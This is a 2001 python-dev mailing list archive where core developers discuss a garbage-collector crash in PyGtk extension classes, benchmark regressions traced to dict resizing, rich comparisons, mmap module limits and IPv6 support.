a summary of the problem and a workaround In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: On Thu, 17 May 2001 skip@pobox.com wrote: > > Over the past couple days I've included python-dev on various messages in an > ongoing thread about a segmentation violation I was getting with the new > PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil > Schemenauer, I finally know what's going on and I have a simple workaround > that lets me get back to work. Here's a summary of the problem. > > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. It looks something like so: > > PyExtensionClass PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... > }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime. (I'm not sure why this Windows nit > doesn't afflict other type declarations like PyTuple_Type. I'm sure others > will know why. I just accept Jim's word as gospel and move on...) Well, for Extension Classes, PyType_Type is not correct either. And because ExtensionClass is loaded at runtime, we can't set the ob_type field in the initialiser even on Unix systems. > > A problem arises if the garbage collector runs while the module > initialization function is running, but before all the ob_type fields have > been assigned their correct values. In this case, a one-element tuple > representing the bases of a particular PyGtk extension class was traversed > by the garbage collector. > > The workaround turns out to be exceedingly simple: > > import gc > gc.disable() > import gtk > gc.enable() > > I can handle doing that from Python code for the time being and will leave > it up to others to decide how, if at all, ExtensionClass should be changed > to correct the problem. Thanks for debugging this problem Skip. If we don't find a correct solution to the problem, I can put the gc disable/enable calls inside the gtk/__init__.py module. James. From mal@lemburg.com Thu May 17 08:26:32 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 09:26:32 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B037D27.E258C363@lemburg.com> Tim Peters wrote: > > [MAL] > > Since it is possible that these figures result from my specific > > machine setup, I'd like to know what other people see on their > > machines. > > Is this the same machine where you were able to get 15% difference a few > years ago by adding or removing an unreachable printf in ceval.c (or was that > Vladimir)? If so, I bet it's degenerated to random 50% difference since then > . That must have been Valdimir's machine... even though I do admit that some small reordering changes do result in speedups of up to 10% -- probably due to the compiler accidentally creating code which the CPUs cache management likes. > My Win98SE box is *astonishingly* useless for timings. Without fail, the > first time I run pystone after a reboot yields a result a solid 50% higher > than the second or subsequent times I run it (yes, it's major-league *slower* > the second time). This is true across dozens of trials over several months, > and across all versions of Python. On Linux the situation is somewhat different; still I'm executing the tests 10-times each and for the figures I posted, I even ran pybench twice and only took the second readings as basis. > And simple little loops routinely vary in reported runtime by a factor of 3. > I may have to dig my old Win95 box out of the packing crate <0.6 wink>. > > None of that changes, of course, that the numbers you got are scary. Sure are... but I'm not so much interested in the absolute numbers -- it's the hot-spots which showed up that scare me: e.g. dictionary creation seems to have suffered along the way for some reason, functions calls are even slower now than they were previously and other important tasks such a instance creation take a similar hit (probably as a result of the other two). Running the same test for 2.1 vs. 2.0 there's not much to notice, so the important changes seem to be originating in the move from 1.5.2 to 2.0. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From james@daa.com.au Thu May 17 08:33:17 2001 From: james@daa.com.au (James Henstridge) Date: Thu, 17 May 2001 15:33:17 +0800 (WST) Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Message-ID: On Thu, 17 May 2001, Fredrik Lundh wrote: > footnote: this is usually done in the module init function, *before* > the call to Py_InitModule. see: The PyExtensionClass_Export() function requires a pointer to the module dictionary so that it can add itself to the module. Unfortunately this requires that Py_InitModule to have been called before hand. I guess this means that the current ExtensionClass API will need to be modified in order to allow ExtensionClasses to be initialised before Py_InitModule. > > http://www.python.org/doc/FAQ.html#3.24 > > if the garbage collector can run after Python calls a module's init- > function, but before that module calls back into Python, anything > can happen... James. From mwh@python.net Thu May 17 08:43:38 2001 From: mwh@python.net (Michael Hudson) Date: 17 May 2001 08:43:38 +0100 Subject: [Python-Dev] Performance compares In-Reply-To: "M.-A. Lemburg"'s message of "Thu, 17 May 2001 09:26:32 +0200" References: <3B037D27.E258C363@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > Sure are... but I'm not so much interested in the absolute numbers > -- it's the hot-spots which showed up that scare me: e.g. dictionary > creation seems to have suffered along the way for some reason, > functions calls are even slower now than they were previously and > other important tasks such a instance creation take a similar hit > (probably as a result of the other two). Have you tried fiddling with gc parameters? If the GC does a multi generation trawl through the heap in the middle of some test, that might skew the numbers in unexpected ways. Or not, of course. Cheers, M. -- CLiki pages can be edited by anybody at any time. Imagine the most fearsomely comprehensive legal disclaimer you have ever seen, and double it -- http://ww.telent.net/cliki/index From mal@lemburg.com Thu May 17 10:03:06 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 11:03:06 +0200 Subject: [Python-Dev] Performance compares References: <3B037D27.E258C363@lemburg.com> Message-ID: <3B0393CA.7B0E024C@lemburg.com> Michael Hudson wrote: > > "M.-A. Lemburg" writes: > > > Sure are... but I'm not so much interested in the absolute numbers > > -- it's the hot-spots which showed up that scare me: e.g. dictionary > > creation seems to have suffered along the way for some reason, > > functions calls are even slower now than they were previously and > > other important tasks such a instance creation take a similar hit > > (probably as a result of the other two). > > Have you tried fiddling with gc parameters? If the GC does a multi > generation trawl through the heap in the middle of some test, that > might skew the numbers in unexpected ways. > > Or not, of course. No, I haven't tried fiddling with those. I'm not sure I want to either ;-) ... the reason is that applications won't switch off GC for execution and so the tests is closer to real life. Still, I'll rerun the test suite using gc.disable() and post the results. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Thu May 17 10:18:36 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 11:18:36 +0200 Subject: [Python-Dev] Performance compares References: <3B037D27.E258C363@lemburg.com> <3B0393CA.7B0E024C@lemburg.com> Message-ID: <3B03976C.CF47961@lemburg.com> "M.-A. Lemburg" wrote: > > Michael Hudson wrote: > > > > "M.-A. Lemburg" writes: > > > > > Sure are... but I'm not so much interested in the absolute numbers > > > -- it's the hot-spots which showed up that scare me: e.g. dictionary > > > creation seems to have suffered along the way for some reason, > > > functions calls are even slower now than they were previously and > > > other important tasks such a instance creation take a similar hit > > > (probably as a result of the other two). > > > > Have you tried fiddling with gc parameters? If the GC does a multi > > generation trawl through the heap in the middle of some test, that > > might skew the numbers in unexpected ways. > > > > Or not, of course. > > No, I haven't tried fiddling with those. I'm not sure I want > to either ;-) ... the reason is that applications won't switch > off GC for execution and so the tests is closer to real life. > > Still, I'll rerun the test suite using gc.disable() and post the > results. Turns out, the difference is not noticable (< 1%). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From gmcm@hypernet.com Thu May 17 14:00:27 2001 From: gmcm@hypernet.com (Gordon McMillan) Date: Thu, 17 May 2001 09:00:27 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <3B03932B.8219.CCBF9F3F@localhost> [Skip] > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. > It would normally be the address of a type object (e.g. > &PyType_Type). However, Jim Fulton pointed out that on Windows > you can't get the address of &PyType_Type object at compile time. This is MS being passive-aggressive. If you tell MSVC the source is C++, it will magically find the address of PyType_Type at compile time, but their language lawyers apparently believe the C spec disallows this. Standards conformant and incompatible - what-MS-calls-"win-win"-ly y'rs - Gordon From guido@digicool.com Thu May 17 15:04:59 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 09:04:59 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Thu, 17 May 2001 08:12:18 +0200." <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> References: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> Message-ID: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> > I'd still be in favour of giving strings a richcompare, since it > allows to optimize what I think is the single most frequent case: > Py_EQ on strings. I have always thought that eventually (but long before Py3K!) all objects would only support rich comparisons and the __cmp__ and tp_compare slots would become completely obsolete. I realize I probably haven't expressed this thought clearly, and I'm not going to push for this to happen quickly or forecefully, but it's nevertheless how I see things. I expect it would allow a tremendous cleanup of the comparison code. It will never reach the simplicity of cmp() -- but think of Einstein's (?) rule "things should be as simple as they can be, but no simpler." Clearly cmp() was too simple. :-) Anyway, it worries me whenever I hear someone express the thought that adding rich comparisons to a particular object type would be a bad idea because it would slow things down. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Thu May 17 15:37:30 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 10:37:30 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: Your message of "Thu, 17 May 2001 09:00:27 EDT." <3B03932B.8219.CCBF9F3F@localhost> References: <3B03932B.8219.CCBF9F3F@localhost> Message-ID: <200105171437.f4HEbUB09503@odiug.digicool.com> > [Skip] > > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. > > It would normally be the address of a type object (e.g. > > &PyType_Type). However, Jim Fulton pointed out that on Windows > > you can't get the address of &PyType_Type object at compile time. > > This is MS being passive-aggressive. If you tell MSVC the > source is C++, it will magically find the address of > PyType_Type at compile time, but their language lawyers > apparently believe the C spec disallows this. Standards > conformant and incompatible - > > what-MS-calls-"win-win"-ly y'rs > > - Gordon I don't think MS blames it on the language spec so much; it's probably more that they use the spec as an excuse not to fix their implementation. The problem only occurs when the definition of the symbol is in a different DLL than the reference. This is why built-in types like PyTuple_Type don't have this problem. I guess for C++ they have to do a dynamic initializer anyway, so they can make this work, but they haven't bothered to make it work for C. My other point is that Skip's problem is clearly a gtk bug: it shouldn't have exposed the type before fully initializing it. --Guido van Rossum (home page: http://www.python.org/~guido/) From james@daa.com.au Thu May 17 15:48:43 2001 From: james@daa.com.au (James Henstridge) Date: Thu, 17 May 2001 22:48:43 +0800 (WST) Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <200105171437.f4HEbUB09503@odiug.digicool.com> Message-ID: On Thu, 17 May 2001, Guido van Rossum wrote: > My other point is that Skip's problem is clearly a gtk bug: it > shouldn't have exposed the type before fully initializing it. On further investigation, it turned out that it was caused by a bug in my code generator that caused one extension class to be initialised before its base class (in fact, that particular extension class shouldn't have had any base classes). It was just the cyclic GC code triggering the bug. It will be fixed in the next snapshot of pygtk for GTK+ 2.0 James. -- Email: james@daa.com.au WWW: http://www.daa.com.au/~james/ From guido@digicool.com Thu May 17 15:52:54 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 10:52:54 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: Your message of "Thu, 17 May 2001 22:48:43 +0800." References: Message-ID: <200105171452.f4HEqse09691@odiug.digicool.com> > On further investigation, it turned out that it was caused by a bug in my > code generator that caused one extension class to be initialised before > its base class (in fact, that particular extension class shouldn't have > had any base classes). It was just the cyclic GC code triggering the bug. > > It will be fixed in the next snapshot of pygtk for GTK+ 2.0 Excellent news, James! I love the open source process! --Guido van Rossum (home page: http://www.python.org/~guido/) From barry@digicool.com Thu May 17 16:04:50 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Thu, 17 May 2001 11:04:50 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <200105171452.f4HEqse09691@odiug.digicool.com> Message-ID: <15107.59538.421007.37251@anthem.wooz.org> >>>>> "GvR" == Guido van Rossum writes: GvR> Excellent news, James! I love the open source process! No kidding! http://perens.com/Articles/StandTogether.html :) From Barrett@stsci.edu Thu May 17 15:56:49 2001 From: Barrett@stsci.edu (Paul Barrett) Date: Thu, 17 May 2001 10:56:49 -0400 Subject: [Python-Dev] mmap module Message-ID: <3B03E6B1.A19F6594@STScI.Edu> In the CVS log of the mmapmodule.c, Tim Peters says: "The code really needs to be rethought from scratch (not by me, though ...)." Well, I might be the person to do the rethinking, but I'd first like to know what Tim has in mind. I've been playing around with this module lately and tend to agree that some enhancements could be made, particularly to prevent "bus errors" and "segmentation faults". The ability to have offsets into a file that are not multiples of the system pagesize would also be nice. I'd be willing to submit a PEP on a new mmapmodule, once I know what others would like. -- Paul -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From tim.one@home.com Thu May 17 17:02:38 2001 From: tim.one@home.com (Tim Peters) Date: Thu, 17 May 2001 12:02:38 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I have always thought that eventually (but long before Py3K!) all > objects would only support rich comparisons and the __cmp__ and > tp_compare slots would become completely obsolete. I realize I > probably haven't expressed this thought clearly, and I'm not going to > push for this to happen quickly or forecefully, but it's nevertheless > how I see things. I expect it would allow a tremendous cleanup of the > comparison code. It will never reach the simplicity of cmp() -- but > think of Einstein's (?) rule "things should be as simple as they can > be, but no simpler." Clearly cmp() was too simple. :-) > > Anyway, it worries me whenever I hear someone express the thought that > adding rich comparisons to a particular object type would be a bad > idea because it would slow things down. At the moment, "almost all" comparisons in the dynamic sense have no need of richcmps, so clearly "Clearly cmp() was too simple. :-)" was too simple . For now richcmps are a tail-wagging-the-dog phenomenon, or more like the tail growing 10 pounds of dense matted hair, making the once-frisky puppy slow to a crawl because its butt is scraping the ground . Martin and I can resolve our differences wrt strings via getting rid of old strcmp entirely. Do you like the implications? 1. Code using cmp(string1, string2) will clearly run significantly slower, calling string comparison 1 (when == obtains), 2 (when < obtains), or 3 (when > obtains) times instead of always once only. Since == is the least likely outcome when using cmp() on strings (you can conclude that by instrumenting Python, or by common sense <0.5 wink>), the number of string compare calls more than doubles in practice for string cmp()-slinging programs (which includes existing well-written tree-based lookup schemes). 2. String dictionary lookup will, unlike the general non-dict case Martin instrumented, never pass the new "are the pointers the same?" richcmp Py_EQ test (because dict lookup already makes that test inline). So if old strcmp goes away, dict lookups that have to resort to strcmp will start paying for hopeless tests. OTOH, the "pointers equal?" test looks of dubious value for the non-dict string case anyway (where it succeeded only 1 in 20 times). #2 is a special case that can be special-cased to death, but #1 likely applies to code using cmp() for comparisons of objects of any type, and that's the primary reason I've resisted adding richcmps to the heavily-compared types (variously string, int, float, long, and type objects). Also the case that adding "a fast path" shouldn't have to endure wading thru multiple gimmicks (kinda defeats the idea of "fast" ), so the instant *one* heavily-compared basic type grows a richcmp (there are 0 such today), all should. So that's what I'll aim at. From guido@digicool.com Thu May 17 19:18:27 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 14:18:27 -0400 Subject: [Python-Dev] IPv6 Message-ID: <200105171818.f4HIIRv12891@odiug.digicool.com> What's out IPv6 story? I recall that someone once sent me patches, but they didn't work for me. Is it time to try again? In certain circles IPv6 support in Python would be enough to switch programming languages... :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From martin@loewis.home.cs.tu-berlin.de Thu May 17 20:45:29 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 21:45:29 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> > 1. Code using cmp(string1, string2) will clearly run significantly > slower, calling string comparison 1 (when == obtains), 2 (when < > obtains), or 3 (when > obtains) times instead of always once only. I'd like to question the rationale behind this procedure. If a type has both tp_compare and tp_richcompare, and the application is performing cmp(o1, o2): Why is it then a good thing to emulate 3way compare using rich compare? I just changed the order in do_cmp, to the IMO more correct if (v->ob_type == w->ob_type && (f = v->ob_type->tp_compare) != NULL) return (*f)(v, w); c = try_rich_to_3way_compare(v, w); if (c < 2) return c; c = try_3way_compare(v, w); if (c < 2) return c; return default_3way_compare(v, w); With that, I got only a single failure in the test suite: test_userlist fails with exceptions.RuntimeError: UserList.__cmp__() is obsolete Tim thinks this is a bug in UserList, since __cmp__ is not obsolete; I agree. According to the CVS log, this implementation of do_cmp was installed in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific rationale for doing do_cmp in that order? Regards, Martin From tim@digicool.com Thu May 17 23:55:19 2001 From: tim@digicool.com (Tim Peters) Date: Thu, 17 May 2001 18:55:19 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) Message-ID: The worst percentage hit in both MAL's and Jeremy's pybench run was (here showing Jeremy's numbers, cuz I doubt anyone could reproduce MAL's ): DictCreation: 87.80 ms 2.93 us +115.72% Assorted things do not account for it: the new overhead of linking and unlinking dicts into the gc list (at creation and destruction times) seems to account for no more than 2%; and the overhead due to using the slower lookdict (as opposed to lookdict_string) even less. Jeremy cheated by running a profiler: the true cause is that dictresize gets called about twice as often. Before 2.1: *before* inserting an item, we checked to see whether the dict was at the resize point. If so, we resized it. Note that this meant PyDict_SetItem could grow a dict even if no new entry was made (and that this was the cause of several excruciating bugs in the 2.1 release cycle, since it meant a dict could get reshuffled merely when replacing the values associated with existing keys). 2.1: *after* inserting an item, and if the key was new (i.e., the dict grew a new entry, as opposed to just replacing the value associated with an existing key), and the dict is at the resize point, we resize it. Now the DictCreation test overwhelmingly creates dicts of size exactly 3. The dict resizes from empty to capacity 4 on the way to gaining 2 entries. When adding the third: Before 2.1: 2 < (2/3)*4 == 2 2/3, so the dict is not resized and ends up remaining a capacity-4 dict with 3 slots full. This actually violates a documented dict invariant (i.e., that dicts are never more than 2/3rd full). 2.1: The third item added is a new item, and 3 > (2/3)*4 == 2 2/3, so we *do* resize it, and the dict ends up with 3 of 8 slots full. I've got no interest in trying to restore the old behavior. A compromise may be to boost the minimum size of a non-empty dict from 4 to 8. As is, the only non-empty dicts that can get away with using the current minimum size of 4 have no more than 2 elements. The question is whether such tiny non-empty dicts are common enough to make everyone else pay for "an extra" resize. go-ahead-just-*try*-to-prove-your-answer-ly y'rs - tim From skip@pobox.com (Skip Montanaro) Fri May 18 00:21:50 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 17 May 2001 18:21:50 -0500 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com> References: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: <15108.23822.538016.564151@beluga.mojam.com> Guido> In certain circles IPv6 support in Python would be enough to Guido> switch programming languages... :-) Sounds like someone has caught the scent of world domination... ;-) S From jeremy@digicool.com Thu May 17 19:39:07 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Thu, 17 May 2001 14:39:07 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: References: Message-ID: <15108.6859.810306.811326@slothrop.digicool.com> Another option is to change the benchmark to put one more item in the dict. Then the same number of resizes would occur with both versions of Python. Jeremy From tim.one@home.com Fri May 18 01:08:13 2001 From: tim.one@home.com (Tim Peters) Date: Thu, 17 May 2001 20:08:13 -0400 Subject: [Python-Dev] mmap module In-Reply-To: <3B03E6B1.A19F6594@STScI.Edu> Message-ID: [Paul Barrett] > In the CVS log of the mmapmodule.c, Tim Peters says: > > "The code really needs to be rethought from scratch (not by me, though > ...)." That was in specific reference to the code I changed, in mmap_find_method. The difficulty is that mmap is great for "large files", but the code before my change used a C int for the starting offset and also for the return value; I boosted those to a C long, which covers 63 bits on 64-bit Linux boxes, but doesn't help 64-bit Windows at all (where a C long remains 4 bytes). The mmap_object struct uses size_t to declare the relevant members, which is possibly better still than C long, but may still leave platform capabilities out of reach for large files (e.g., "even Win95" *allows* specifying 64-bit offsets when creating a mapped file view). C is a friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue() don't cater to the full range of C integral types anyway. In other words, if this code is ever to reach its full potential, it "really needs to be rethought from scratch". > Well, I might be the person to do the rethinking, but I'd first like > to know what Tim has in mind. Nothing that you did . > I've been playing around with this module lately and tend to agree > that some enhancements could be made, particularly to prevent "bus > errors" and "segmentation faults". When you get one of those, it's a bug in Python! > The ability to have offsets into a file that are not multiples of the > system pagesize would also be nice. It's OS-specific. Python should grow warts to protect against it on the OSes that care. > I'd be willing to submit a PEP on a new mmapmodule, once I know what > others would like. Hard to say. This has the potential to become Python's next thread subsystem, i.e. an endless and ultimately hopeless x-platform nightmare. If you do write a PEP, I vote to say that we'll cover Windows and Linux (and maybe Mac OS X?) out of the box, but any other platform is at your own risk (it doesn't really help if somebody pops up volunteering to support a minority platform, because they eventually go away, their code stops working, and it never gets fixed -- so it's use-at-your-own-risk in reality regardless). From tim.one@home.com Fri May 18 01:29:18 2001 From: tim.one@home.com (Tim Peters) Date: Thu, 17 May 2001 20:29:18 -0400 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: [Guido van Rossum] > What's out IPv6 story? Ah! If that's version 6 of the Integer-Point alternative to Floating-Point, I've got it covered. Otherwise my guess is we have no story at all. > I recall that someone once sent me patches, but they didn't work for me. Try recompiling with -DLONG_BIT=33. > Is it time to try again? In certain circles IPv6 support in Python > would be enough to switch programming languages... :-) Floating-point is *that* bad?! ever-helpful-ly y'rs - tim From jeremy@digicool.com Thu May 17 23:16:15 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Thu, 17 May 2001 18:16:15 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: References: Message-ID: <15108.19887.534514.864376@slothrop.digicool.com> >>>>> "TP" == Tim Peters writes: TP> I've got no interest in trying to restore the old behavior. A TP> compromise may be to boost the minimum size of a non-empty dict TP> from 4 to 8. As is, the only non-empty dicts that can get away TP> with using the current minimum size of 4 have no more than 2 TP> elements. The question is whether such tiny non-empty dicts are TP> common enough to make everyone else pay for "an extra" resize. I also did a profile run on CreateInstances, which has a difference of +55.54% on my machine. It's basically the same story. The instance dictionary is getting resized more often with Python 2.1+ than it did with Python 1.5.2. I wouldn't be surprised if several more tests are showing a slowdown with the same cause. So boosting the minimum size sounds like a good thing. Jeremy From tim.one@home.com Fri May 18 04:26:52 2001 From: tim.one@home.com (Tim Peters) Date: Thu, 17 May 2001 23:26:52 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: <005701c0dd38$2f417560$0900a8c0@spiff> Message-ID: [/F] > more info here: > > http://home.rica.net/alphae/419coal/index.htm > > "A Five Billion US$ (as of 1996, much more now) worldwide > Scam which has run since the early 1980's under Successive > Governments of Nigeria. > > "The Nigerian Scam is, according to published reports, the > Third to Fifth largest industry in Nigeria." Most interesting to me is that US Post Office is upset about this: http://www.usps.gov/websites/depart/inspect/pressrel.htm They don't seem to care so much that people are getting scammed, but that the letters mailed from Nigeria to advance the fee-extorting phase of the scam often use counterfeit postage! Where else but here http://www.usps.gov/websites/depart/inspect/metercap.htm could you learn that "Postage meters are not used in Nigeria -— therefore, all postage meter impressions on Nigerian mail are counterfeit!"? governments-are-mostly-insane-ly y'rs - tim From martin@loewis.home.cs.tu-berlin.de Fri May 18 05:45:21 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 18 May 2001 06:45:21 +0200 Subject: [Python-Dev] IPv6 References: Message-ID: <200105180445.f4I4jL101178@mira.informatik.hu-berlin.de> > What's out IPv6 story? I recall that someone once sent me patches, > but they didn't work for me. Is it time to try again? In certain > circles IPv6 support in Python would be enough to switch programming > languages... :-) It's still on SF, http://sourceforge.net/tracker/index.php?func=detail&aid=401196&group_id=5470&atid=305470 There are two problems with that patch, AFAICT: 1. It is too large for any individual to review in one chunk. 2. It gets quickly outdated. 3. It touches core aspects of the socket handling that are IMO better untouched. I don't know whether the generalization proposed there is necessary to support IPv6 reasonably - the author certainly feels it is. To integrate the patch, I would propose to split it into smaller parts, and submit and review them one-by-one. The first patch should deal only with autoconf stuff, so that the proper #defines are in config.h (although they would not be used right away). The second patch should be a tar file of all new files (the patch on SF actually misses some files). The third patch should include changes to the C modules, and the last one changes to the standard library modules. For that procedure to work, we need cooperation from the submitter. For that, we probably need to indicate that we are really interested in his work, and will work with him to integrate it into Python. So far, his impression must be that nobody is interested - the patch is sitting there since 2000-08-16, making it the oldes open patch. Undoubtedly, integrating this piece of work will result in various problems with Python CVS: it won't build anymore on "funny machines" (like Windows), and it might even crash on code that used to work just fine. This prediction is not based on the actual content of the patch, merely on its size, and the fact that IPv6 support is experimental on many systems. So we'ld also need a BDFL pronouncement that we really really want this, and that anybody running into problems should either help fixing them, or stay away from CVS while it is being integrated. Regards, Martin From tim@digicool.com Fri May 18 08:17:07 2001 From: tim@digicool.com (Tim Peters) Date: Fri, 18 May 2001 03:17:07 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <15108.19887.534514.864376@slothrop.digicool.com> Message-ID: [Jeremy] > I also did a profile run on CreateInstances, which has a difference of > +55.54% on my machine. It's basically the same story. The instance > dictionary is getting resized more often with Python 2.1+ than it did > with Python 1.5.2. I wouldn't be surprised if several more tests are > showing a slowdown with the same cause. > > So boosting the minimum size sounds like a good thing. I don't know. PyBench is great for showing that *something* changed, but it's got even less claim to "typical use" than pystone. I don't know that the test suite is better in that respect, but it's got much more variety and everyone has it . I stuffed code in dict_dealloc() to record the ma_fill of each dict on its way to the grave (ma_fill == number of non-virgin slots). Across the test suite, here's the ranking, from most to least popular fill: count fill %total cumulative % ------ ---- ------ ------------ 146321 1 53.30 53.30 38200 0 13.91 67.21 32616 2 11.88 79.09 29648 3 10.80 89.89 9884 5 3.60 93.49 5423 4 1.98 95.47 2428 6 0.88 96.35 2016 8 0.73 97.08 1179 7 0.43 97.51 904 9 0.33 97.84 709 103 0.26 98.10 554 10 0.20 98.30 513 13 0.19 98.49 459 12 0.17 98.66 447 11 0.16 98.82 364 14 0.13 98.95 233 15 0.08 99.04 231 16 0.08 99.12 193 18 0.07 99.19 180 17 0.07 99.26 122 19 0.04 99.30 107 30 0.04 99.34 105 21 0.04 99.38 93 22 0.03 99.41 93 20 0.03 99.45 86 256 0.03 99.48 82 23 0.03 99.51 80 26 0.03 99.54 74 24 0.03 99.56 69 27 0.03 99.59 64 25 0.02 99.61 60 29 0.02 99.63 49 28 0.02 99.65 44 34 0.02 99.67 33 32 0.01 99.68 28 31 0.01 99.69 27 37 0.01 99.70 27 33 0.01 99.71 26 35 0.01 99.72 24 36 0.01 99.73 23 39 0.01 99.74 23 38 0.01 99.75 21 128 0.01 99.75 19 44 0.01 99.76 19 40 0.01 99.77 17 46 0.01 99.77 16 48 0.01 99.78 15 47 0.01 99.78 14 50 0.01 99.79 14 42 0.01 99.79 There are many more sizes, but I cut off the display here when they got too rare to round to 1% of 1% of the total count. Boosting the first non-empty size to 8 would allow 93+% of all dicts to get away with at most one resize (a dict of size 8 is enough for a fill of 5, but not 6). OTOH, the current first non-empty size of 4 is enough for 79% of all dicts (enough for a fill of 2, but not 3). If oodles of those tiny dicts are alive *at the same time*, it would be quite a waste of space to force the non-empty ones to carry 8 slots. OTOH, if those small dicts are due to things like building one- or two-element keyword argument dicts, their lifetimes rarely overlap. A more aggressive idea is to allow denser dicts, by allowing them to become no more than 75% full. That is, change the resize test from mp->ma_fill*3 >= mp->ma_size*2 to mp->ma_fill*4 > mp->ma_size*3 That would allow the 10.8% of real(er) life dicts with fill 3 to continue living in dicts with 4 slots, and allow about 90% of all dicts to get away with no more than one resize. The downside is that boosting the max load factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit, a small boost in the expected # of compares. But the "theory" is for random hash functions with "uniform probing" (tech term that does *not* mean linear probing), and Python's hash functions often aren't random at all, while AFAIK no rigorous analysis of its probing strategy exists. So, plenty of arbitrary data there upon which to flip a coin . From mal@lemburg.com Fri May 18 08:26:36 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 09:26:36 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: <15108.19887.534514.864376@slothrop.digicool.com> Message-ID: <3B04CEAC.57251CD7@lemburg.com> Jeremy Hylton wrote: > > >>>>> "TP" == Tim Peters writes: > > TP> I've got no interest in trying to restore the old behavior. A > TP> compromise may be to boost the minimum size of a non-empty dict > TP> from 4 to 8. As is, the only non-empty dicts that can get away > TP> with using the current minimum size of 4 have no more than 2 > TP> elements. The question is whether such tiny non-empty dicts are > TP> common enough to make everyone else pay for "an extra" resize. > > I also did a profile run on CreateInstances, which has a difference of > +55.54% on my machine. It's basically the same story. The instance > dictionary is getting resized more often with Python 2.1+ than it did > with Python 1.5.2. I wouldn't be surprised if several more tests are > showing a slowdown with the same cause. > > So boosting the minimum size sounds like a good thing. FYI, I have a patch which inlines small dictionaries directly into the type object (rather than usin malloc to allocate the slot buffer). I've experimented with the minimal size a lot and found that setting it to 8 slots gives the bext performance/memory tradeoff. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim@digicool.com Fri May 18 09:32:39 2001 From: tim@digicool.com (Tim Peters) Date: Fri, 18 May 2001 04:32:39 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: 